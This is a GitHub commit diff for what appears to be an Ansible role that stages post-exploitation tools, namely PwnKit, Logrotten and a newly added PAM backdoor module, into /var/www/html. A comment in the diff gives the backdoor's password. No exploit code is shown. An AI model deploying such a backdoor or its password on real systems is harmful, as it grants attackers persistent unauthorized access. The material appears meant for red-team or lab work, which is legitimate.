We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
There was an error while loading. Please reload this page.
1 parent 29fbcbb commit a6a31f3Copy full SHA for a6a31f3
defaults/main.yml
@@ -7,6 +7,9 @@ postexploit_files:
7
path: PwnKit/PwnKit
8
- name: Logrotten
9
path: Logrotten/logrotten
10
+# password: haveityourway
11
+ - name: pam_unix.so
12
+ path: linux-pam-backdoor/pam_unix.so
13
14
postexploit_destpath: "/var/www/html"
15
postexploit_apache: True
files/linux-pam-backdoor
@@ -0,0 +1 @@
1
+Subproject commit 91e9b6c4cbb45e4bb32c168035b13886a8c4e98c
0 commit comments